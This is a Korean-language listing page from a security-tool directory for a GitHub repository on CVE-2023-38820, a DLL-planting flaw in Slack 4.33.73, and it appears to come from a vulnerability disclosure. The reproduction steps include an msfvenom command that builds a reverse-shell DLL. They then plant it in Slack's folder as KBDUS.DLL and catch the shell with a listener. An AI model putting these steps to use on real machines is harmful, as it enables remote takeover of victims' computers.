Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/trailer2/dll-planting-slack-4.33.73-cve-2023-38820
Privilege EscalationVulnerability AnalysisExploitationLateral MovementPost-ExploitationPayload DevelopmentBinary Exploitation
GitHubtrailer2/dll-planting-slack-4.33.73-cve-2023-38820

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

DLL-Planting-Slack-4.33.73-CVE-2023-38820

Slack 4.33.73에서의 DLL 플랜팅 - CVE-2023-38820

저장소 보기
3년 전아직 검토되지 않음

DLL-Planting-Slack-4.33.73-CVE-2023-38820

Slack 4.33.73의 DLL Planting - CVE-2023-38820 발견자: Idan Malihi

설명

Slack Slack v.4.33.73의 문제로 인해 로컬 공격자가 profapi.dll, CRYPTBASE.dll, KBDUS.DLL, DPAPI.dll, MSASN1.dll, mf.dll, mfplat.dll 및 RTWorkQ.DLL 파일의 DLL 로딩 메커니즘을 통해 임의 코드를 실행할 수 있습니다.

재현 단계

취약점을 악용하려면 공격자는 Slack 프로그램을 다운로드하여 설치하고 다음 단계를 따라야 합니다:

  1. msfvenom으로 악성 dll 파일 생성: msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o profapi.dll
  2. 악성 dll 파일을 피해자의 컴퓨터로 전송합니다.
  3. Slack 경로를 엽니다: "C:\Users\idan.m\AppData\Local\slack\app-4.33.73"
  4. 예시로 악성 dll을 Slack 경로로 전송하고 "KBDUS.DLL"로 이름을 변경합니다.
  5. netcat 또는 metasploit 리스너를 엽니다.
  6. Slack.exe를 실행합니다.
  7. 리버스 셸을 획득합니다.
도구 다운로드